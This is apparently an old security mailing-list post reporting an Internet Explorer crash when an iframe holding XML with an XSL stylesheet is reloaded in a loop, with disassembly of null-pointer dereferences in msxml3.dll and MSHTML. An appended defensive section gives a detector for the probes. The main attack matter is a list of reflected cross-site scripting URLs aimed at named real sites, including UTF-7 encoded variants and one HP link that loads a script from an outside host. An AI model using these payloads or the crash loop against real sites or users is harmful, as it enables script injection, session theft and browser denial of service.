Hi,<br><br>I have found IE crashing when refreshing an iframe containing an xml file with xsl stylesheet (takes a while to crash).<br><br>I used this html:<br>------------------------------<div style="direction: ltr;">---<br>
&lt;html&gt;<br>&lt;head&gt;<br>&lt;script language=&quot;javaScript&quot;&gt;<br>function refresh() {<br> &nbsp; frames[0].window.location.reload();<br>&nbsp; setTimeout(&quot;refresh();&quot;, 20);<br>}<br>&lt;/script&gt;<br>&lt;/head&gt;
<br>&lt;body&gt;&lt;iframe src=&quot;input.xml&quot;&gt;&lt;/iframe&gt;<br>&lt;script&gt;<br>refresh();<br>&lt;/script&gt;<br>&lt;/body&gt;<br>&lt;/html&gt;<br><br>----------------------------------<br>&nbsp;input.xml is calling an xsl stylesheet (cfr. attachment)
<br>&lt;?xml version=&quot;1.0&quot;?&gt;<br>&lt;?xml-stylesheet type=&quot;text/xsl&quot; href=&quot;style2.xsl&quot;?&gt;<br><br>----------------------------------<br>w2k:<br>msxml3.dll:69B76B61 mov &nbsp; &nbsp; eax, [esi]<br>msxml3.dll:69B76B63 mov &nbsp; &nbsp; ecx, esi<br>msxml3.dll:69B76B65 call &nbsp; &nbsp;dword ptr [eax+48h]<br>with esi=0<br><br>MSHTML.DLL:637840E8 test &nbsp; &nbsp;byte ptr [eax+44Dh], 20h<br>with eax=0<br><br>xp:<br>msxml3.dll:74992156&nbsp;&nbsp; 8B43 14&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; MOV EAX,DWORD PTR DS:[EBX+14]
<br>EBX=0<br><br>Seems like null pointer derefs.<br>Weird thing is it crashes on different addresses; can somebody shed some light on why this is?<br></div><br>obligatory xss:<br><br><a href="http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;start=1&amp;nodeid=&amp;fid=&amp;showSimilarDoc=true&amp;group=All">

http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;start=1&amp;nodeid=&amp;fid=&amp;showSimilarDoc=true&amp;group=All</a> secure search, lol?<br><a href="http://oreilly.com/">

oreilly.com</a>: search powered by <a href="http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;sp-a=sp1000a5a9&amp;sp-f=ISO-8859-1&amp;sp-t=general&amp;sp-x-1=cat&amp;sp-q-1=&amp;sp-x-2=cat2&amp;sp-q-2=&amp;sp-c=25&amp;sp-p=all&amp;sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&amp;c=&amp;p=">

http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;sp-a=sp1000a5a9&amp;sp-f=ISO-8859-1&amp;sp-t=general&amp;sp-x-1=cat&amp;sp-q-1=&amp;sp-x-2=cat2&amp;sp-q-2=&amp;sp-c=25&amp;sp-p=all&amp;sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&amp;c=&amp;p=
</a><br><a href="http://www.altavista.com/web/results?itag=ody&amp;q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&amp;kgs=1&amp;kls=0">http://www.altavista.com/web/results?itag=ody&amp;q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&amp;kgs=1&amp;kls=0
</a><br><a href="http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ey00&amp;source=cnn&amp;url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn">

http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert(1)%3C/script%3Ey00&amp;source=cnn&amp;url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn
</a><br><a href="http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&amp;qsrc=1&amp;o=333&amp;l=dir">
http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&amp;qsrc=1&amp;o=333&amp;l=dir
</a><br><a href="http://search.amd.com/query.html?col=idx1&amp;qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&amp;charset=iso-8859-1&amp;qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&amp;qs=%7C+language%3Aen&amp;la=en&amp;lap=en&amp;qm=1&amp;tqmhak=0">

http://search.amd.com/query.html?col=idx1&amp;qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&amp;charset=iso-8859-1&amp;qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&amp;qs=%7C+language%3Aen&amp;la=en&amp;lap=en&amp;qm=1&amp;tqmhak=0
</a><br><a href="http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&amp;url=search-alias%3Daps&amp;field-keywords=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&amp;Go.x=11&amp;Go.y=10">

http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&amp;url=search-alias%3Daps&amp;field-keywords=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&amp;Go.x=11&amp;Go.y=10</a><br><a href="http://search.hp.com/query.html?charset=iso-8859-1&amp;la=en&amp;hpvc=sitewide&amp;qs=&amp;nh=10&amp;lk=1&amp;rf=0&amp;uf=1&amp;st=1&amp;qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&amp;submitsearch.x=0&amp;submitsearch.y=0">

http://search.hp.com/query.html?charset=iso-8859-1&amp;la=en&amp;hpvc=sitewide&amp;qs=&amp;nh=10&amp;lk=1&amp;rf=0&amp;uf=1&amp;st=1&amp;qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&amp;submitsearch.x=0&amp;submitsearch.y=0
</a><br><a href="http://us.mcafee.com/virusInfo/">http://us.mcafee.com/virusInfo/</a> : enter the following in virus search: (use POST form for exploit)<br>
&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;<br><br><br>cheers,<br>Thomas<br>
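Added example (not part of the original post): a log-side check that flags the reflected-XSS probes in the links above, including the UTF-7 encoded variants (+ADw- / +AD4-) from the ask.com and amazon.com links, which a plain match on &lt;script misses. The function names and the benign third sample are constructed for illustration; the first two query strings are copied from the links in the post.

```javascript
// Added example, not from the original post. Node.js, no dependencies.
// The first two query strings are copied from the links in the post;
// the third is a constructed benign request.
const SAMPLES = [
  "keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&start=1",
  "q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&qsrc=1",
  "itag=ody&q=harmless+search&kgs=1",
];

// Markup-breakout shapes seen in the post: <script>, </title>, -->, "> or '>.
const MARKUP = /<\s*\/?\s*script\b|<\s*\/\s*title\b|-->|["']\s*>/i;

// Decode UTF-7 shifted runs: "+<base64 of UTF-16BE>-"; "+-" is a literal plus.
function decodeUtf7(text) {
  return text.replace(/\+([A-Za-z0-9+\/]*)-?/g, (_, b64) => {
    if (b64 === "") return "+";
    const bytes = Buffer.from(b64, "base64");
    let out = "";
    for (let i = 0; i + 1 < bytes.length; i += 2) {
      out += String.fromCharCode((bytes[i] << 8) | bytes[i + 1]);
    }
    return out;
  });
}

// Return one finding per parameter whose value carries markup, either
// directly or only after UTF-7 decoding.
function scanQuery(query) {
  const findings = [];
  for (const [name, value] of new URLSearchParams(query)) {
    if (MARKUP.test(value)) findings.push({ name, via: "plain" });
    else if (MARKUP.test(decodeUtf7(value))) findings.push({ name, via: "utf-7" });
  }
  return findings;
}

// Scan every embedded sample; one array of findings per query string.
function scanAll() {
  return SAMPLES.map(scanQuery);
}

console.log(JSON.stringify(scanAll()));
```

On the serving side, the UTF-7 variants only work when the response leaves the charset for the browser to guess, so an explicit charset in the Content-Type header plus context-aware output encoding of the reflected term covers both forms.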